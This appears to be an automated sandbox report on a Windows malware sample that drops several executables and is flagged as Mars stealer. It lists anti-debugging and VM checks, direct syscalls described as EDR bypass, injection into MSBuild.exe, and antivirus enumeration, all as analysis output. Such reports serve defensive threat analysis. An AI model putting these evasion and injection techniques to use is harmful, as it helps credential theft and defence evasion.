Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2898179431.000001950BED9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: "Caption": "VMware Virtual disk",
Source: QPoX60yhZt.exe, 00000000.00000002.1992058029.0000000004248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(b%
Source: QPoX60yhZt.exe, 00000000.00000003.1816995670.0000000007206000.00000004.00000020.00020000.00000000.sdmp, u5mc.3.exe, 00000005.00000000.1816333516.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Enterprise without Hyper-V Full
Source: MSBuild.exe, 0000000D.00000002.2888616546.0000000000D91000.00000004.00000020.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2973513918.0000019528C3B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	API call chain: ExitProcess graph end node	graph_1-79329
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	API call chain: ExitProcess graph end node	graph_1-79332
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	API call chain: ExitProcess graph end node	graph_1-79373
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	API call chain: ExitProcess graph end node	graph_1-80365
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	API call chain: ExitProcess graph end node	graph_1-79343
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	API call chain: ExitProcess graph end node	graph_1-79351
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	API call chain: ExitProcess graph end node	graph_1-79350
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	API call chain: ExitProcess graph end node	graph_1-79079
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe

Code function: 1_2_00402130 LdrInitializeThunk,

1_2_00402130

Source: C:\Users\user\Desktop\QPoX60yhZt.exe

Code function: 0_2_00409A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00409A73

Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe

Code function: 2_2_002AD15B VirtualProtect ?,-00000001,00000104,?,?,?,00000000

2_2_002AD15B

Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe

1_2_00416240

Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: 0_2_004139E7 mov eax, dword ptr fs:[00000030h]	0_2_004139E7
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: 0_2_041954B3 push dword ptr fs:[00000030h]	0_2_041954B3
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: 0_2_05BF0D90 mov eax, dword ptr fs:[00000030h]	0_2_05BF0D90
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: 0_2_05C03C4E mov eax, dword ptr fs:[00000030h]	0_2_05C03C4E
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: 0_2_05BF092B mov eax, dword ptr fs:[00000030h]	0_2_05BF092B
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_00415DC0 mov eax, dword ptr fs:[00000030h]	1_2_00415DC0

Source: C:\Users\user\Desktop\QPoX60yhZt.exe

Code function: 0_2_00420AEA GetProcessHeap,

0_2_00420AEA

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: 0_2_00409A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00409A73
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: 0_2_00409C06 SetUnhandledExceptionFilter,	0_2_00409C06
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: 0_2_00409EBE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00409EBE
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: 0_2_0041073B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0041073B
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: 0_2_05BF9CDA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_05BF9CDA
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: 0_2_05BF9E6D SetUnhandledExceptionFilter,	0_2_05BF9E6D
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: 0_2_05C009A2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_05C009A2
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: 0_2_05BFA125 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_05BFA125
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_00419DC7 SetUnhandledExceptionFilter,	1_2_00419DC7
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_00417B4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00417B4E
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_004173DD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_004173DD
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA4B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_6BA4B1F7
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA4B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_6BA4B66C
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BBFAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_6BBFAC62
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Code function: 2_2_002AC1FD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_002AC1FD
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Code function: 2_2_002B6678 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_002B6678
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Code function: 2_2_6C342782 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_6C342782
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Code function: 2_2_6C3490E9 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6C3490E9

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	NtSetInformationThread: Direct from: 0x6C25617C	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	NtQuerySystemInformation: Direct from: 0x1A5BE4
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	NtProtectVirtualMemory: Direct from: 0x76EF7B2E	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	NtSetInformationThread: Direct from: 0x6CBA617C

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: read write

Searches for specific processes (likely to inject)

Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe

Code function: 1_2_00415D00 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

1_2_00415D00

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 6A381000	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 921008	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 6A381000
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D57008

Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Process created: C:\Users\user\AppData\Local\Temp\u5mc.0.exe "C:\Users\user\AppData\Local\Temp\u5mc.0.exe"	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Process created: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe "C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe"	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Process created: C:\Users\user\AppData\Local\Temp\u5mc.3.exe "C:\Users\user\AppData\Local\Temp\u5mc.3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\BAEBFIIECB.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Process created: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\BAEBFIIECB.exe "C:\Users\user\AppData\Local\Temp\BAEBFIIECB.exe"
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe

Code function: 2_2_6C253470 GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,DuplicateToken,AllocateAndInitializeSid,LocalAlloc,InitializeSecurityDescriptor,GetLengthSid,LocalAlloc,InitializeAcl,AddAccessAllowedAce,SetSecurityDescriptorDacl,SetSecurityDescriptorGroup,SetSecurityDescriptorOwner,IsValidSecurityDescriptor,AccessCheck,

2_2_6C253470

Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe

2_2_6C253470

Source: QPoX60yhZt.exe, 00000000.00000003.1816995670.0000000007206000.00000004.00000020.00020000.00000000.sdmp, u5mc.3.exe, 00000005.00000000.1816333516.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: TrayNotifyWndShell_TrayWnd
Source: QPoX60yhZt.exe, 00000000.00000003.1816995670.0000000007206000.00000004.00000020.00020000.00000000.sdmp, u5mc.3.exe, 00000005.00000000.1816333516.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Shell_TrayWndtooltips_class32SVWU
Source: QPoX60yhZt.exe, 00000000.00000003.1816995670.0000000007206000.00000004.00000020.00020000.00000000.sdmp, u5mc.3.exe, 00000005.00000000.1816333516.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Shell_TrayWndtooltips_class32S

Source: C:\Users\user\Desktop\QPoX60yhZt.exe

Code function: 0_2_00409D1B cpuid

0_2_00409D1B

Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_0042086B
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: EnumSystemLocalesW,	0_2_004170F1
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: EnumSystemLocalesW,	0_2_004201F6
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: EnumSystemLocalesW,	0_2_004201AB
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: EnumSystemLocalesW,	0_2_00420291
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_0042031E
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: GetLocaleInfoW,	0_2_004174E4
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: GetLocaleInfoW,	0_2_0042056E
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00420697
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_0041FF33
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: GetLocaleInfoW,	0_2_0042079E
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: EnumSystemLocalesW,	0_2_05C104F8
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: EnumSystemLocalesW,	0_2_05C1045D
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: EnumSystemLocalesW,	0_2_05C10412
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: GetLocaleInfoW,	0_2_05C107D3
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: GetLocaleInfoW,	0_2_05C107D5
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: GetLocaleInfoW,	0_2_05C0774B
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_05C1019A
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_05C108FE
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: EnumSystemLocalesW,	0_2_05C07358
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_05C10AD2
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: GetLocaleInfoW,	0_2_05C10A05
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	1_2_00414570

Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5mc.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5mc.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5mc.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5mc.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5mc.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5mc.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5mc.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5mc.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5mc.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5mc.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5mc.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5mc.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5mc.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5mc.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5mc.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5mc.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5mc.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework-SystemXml\v4.0_4.0.0.0__b77a5c561934e089\PresentationFramework-SystemXml.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationTypes\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationTypes.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationProvider\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationProvider.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation

Source: C:\Users\user\Desktop\QPoX60yhZt.exe

Code function: 0_2_0040996D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_0040996D

Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe

Code function: 1_2_004143C0 GetProcessHeap,HeapAlloc,GetUserNameA,

1_2_004143C0

Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe

Code function: 1_2_004144B0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

1_2_004144B0

Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe

Code function: 1_2_6BB48390 NSS_GetVersion,

1_2_6BB48390

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected Mars stealer

Source: Yara match	File source: 1.2.u5mc.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.u5mc.0.exe.41b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5mc.0.exe.4180e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5mc.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5mc.0.exe.4180e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.u5mc.0.exe.41b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1687809776.00000000041B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
